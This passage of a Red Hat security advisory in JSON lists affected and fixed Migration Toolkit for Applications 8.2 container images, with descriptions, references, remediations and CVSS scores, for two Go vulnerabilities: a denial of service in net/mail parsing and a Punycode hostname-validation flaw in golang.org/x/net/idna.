"text": "This is an Important denial of service vulnerability in the Go `net/mail` package. Applications processing untrusted email inputs via `ParseAddress`, `ParseAddressList`, or `ParseDate` functions are susceptible to excessive resource consumption, which can lead to service unavailability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-39820"
},
{
"category": "external",
"summary": "RHBZ#2467820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467820"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-39820",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39820"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39820",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39820"
},
{
"category": "external",
"summary": "https://go.dev/cl/759940",
"url": "https://go.dev/cl/759940"
},
{
"category": "external",
"summary": "https://go.dev/issue/78566",
"url": "https://go.dev/issue/78566"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M",
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4986",
"url": "https://pkg.go.dev/vuln/GO-2026-4986"
}
],
"release_date": "2026-05-07T19:41:19.854000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net/mail: golang: Go net/mail: Denial of Service via crafted email inputs"
},
{
"cve": "CVE-2026-39821",
"cwe": {
"id": "CWE-1289",
"name": "Improper Validation of Unsafe Equivalence in Input"
},
"discovery_date": "2026-05-22T16:00:52.844126+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2480756"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang.org/x/net/idna. ToASCII and ToUnicode incorrectly accept Punycode-encoded labels that decode to an ASCII-only hostname (for example, xn--example-.com returns example.com instead of an error). Applications that validate the ASCII form then convert to Unicode may grant access to a restricted hostname the ASCII check would have rejected.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/net/idna: golang: net/http: golang.org/x/net/idna: Privilege escalation via incorrect Punycode label processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "golang.org/x/net/idna is vulnerable to privilege escalation through incorrect Punycode label handling in ToASCII and ToUnicode. An attacker who can supply a Punycode hostname that passes an ASCII-only authorization check may have it normalized to a restricted ASCII name the application intended to block. Red Hat exposure is broad across products shipping the Go toolchain or bundling golang.org/x/net, including RHEL and RHEL-AI golang RPMs, hummingbird Go runtimes, OpenShift and ODF container builds, and Ceph/OpenShift components compiled against affected x/net versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
